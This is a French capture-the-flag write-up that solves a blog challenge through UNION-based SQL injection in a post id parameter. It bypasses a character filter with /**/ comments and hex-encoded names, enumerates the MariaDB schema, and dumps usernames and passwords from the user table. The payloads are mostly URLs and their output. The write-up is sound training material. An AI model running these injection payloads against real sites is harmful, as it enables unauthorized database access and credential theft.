**La méthode ci-dessous est détaillée. Des outils tel que sqlmap ou des scripts bien préparés font le même boulot mais je trouve intéressant de pouvoir comprendre (au début tout du moins ensuite c'est vrai que les outils et automatisation sont top :) ).**



Pour ce deuxième challenge, l'url est la suivante :

https://secureblog.challenge.operation-kernel.fr/v2

Après un tour des différentes pages du site on remarque que le login a été désactivé.
En revanche des blogs ont été postés et l'url se compose de la sorte :

https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=3

L'idée ici est d'ajouter du SQL en bout d'url afin de voir s'il est possible de requêter la base de données et d'en sortir des logins/mdp.


Je vais effectuer plusieurs tests afin de déterminer la syntaxe à saisir. 
(il est également possible de scripter afin d'automatiser :) 
Tout d'abord j'ajoute le caractère **'** en fin d'url et j'obtiens

```
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=3'
```
```
An unauthorized character/request has been detected ! This query has been blocked.
```


On a donc bien des caractères qui sont filtrés.

Je tente un autre début de requête basée sur **UNION**
```
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=3 UNION
```

même verdict

```
An unauthorized character/request has been detected ! This query has been blocked.
```


Ici, deux choses sont possiblement filtrées **l'espace** après le 3 ou **UNION**.

Je remplace dans un premier temps l'espace par une autre syntaxe /**/

```
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=3/**/UNION
```

et ça passe !!
J'obtiens certes un 404 mais pas de filtres

```
404 - Not found !
Page non disponibles ! :( 
```


Je complète donc ma requête SQL

```
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=3/**/UNION/**/SELECT/**/null --> 404
```


Je rajoute des null ce qui permet de déterminer le nombres de champs rapportés par la requête

```
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=3/**/UNION/**/SELECT/**/null --> 404
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=3/**/UNION/**/SELECT/**/null,null --> 404
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=3/**/UNION/**/SELECT/**/null,null,null --> 404
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=3/**/UNION/**/SELECT/**/null,null,null,null --> 404
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=3/**/UNION/**/SELECT/**/null,null,null,null,null --> 200
```

On a donc 5 champs rapporter, je remplace les null par des valeurs afin de voir leur position sur la page en choisissant un id=4 correspondant à une page n'existant pas.

```
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=4/**/UNION/**/SELECT/**/1,2,3,4,5
```

Les champs repérés, je décide de choisir le quatrième pour l'affichage des données recherchées.
Ci-dessous une série de recherches avec leur résultat. Requête qui sont passées du premier coup, sinon il faut adapter la syntaxe (version(), @@version, ...)

```
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=4/**/UNION/**/SELECT/**/1,2,3,version(),5

10.3.35-MariaDB-1:10.3.35+maria~focal 


https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=4/**/UNION/**/SELECT/**/1,2,3,database(),5

challv2


https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=4/**/UNION/**/SELECT/**/1,2,3,group_concat(table_name),5/**/from/**/information_schema.tables/**/where/**/table_schema=database()

article,user 
```

Deux tables **article** et **user** sont trouvées pour la base **challv2**


Pour continuer à requêter de la sorte, il faut transformer le nom de la table en sa valeur héxadécimale.
La raison est qu'il faudrait écrire **table_name="user"** or le caractère **"** est filtré !
 
En héxadécimal **user = 0x75736572**
on peut faire de même avec le nom de la base **challv2 = 0x6368616c6c7632**

```
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=4/**/UNION/**/SELECT/**/1,2,3,group_concat(column_name),5/**/from/**/information_schema.columns/**/where/**/table_schema=0x6368616c6c7632/**/AND/**/table_name=0x75736572

id,username,password 
```

Voilà donc les trois colonnes de la table user.
Je peux donc requêter avec les bons champs en faisant varier le LIMIT pour trouver le bon couple login/mdp.

```
https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=4/**/UNION/**/SELECT/**/1,2,3,password,username/**/from/**/user/**/LIMIT/**/0,1

login : demo ; mdp : demo


https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=4/**/UNION/**/SELECT/**/1,2,3,password,username/**/from/**/user/**/LIMIT/**/1,1

login : test ; mdp : St0nnngP444Sw000Rdddd:D!!!! 


https://secureblog.challenge.operation-kernel.fr/v2/post.php?id=4/**/UNION/**/SELECT/**/1,2,3,password,username/**/from/**/user/**/LIMIT/**/2,1

login : admin ; mdp : LE FLAG A TROUVER !!
```
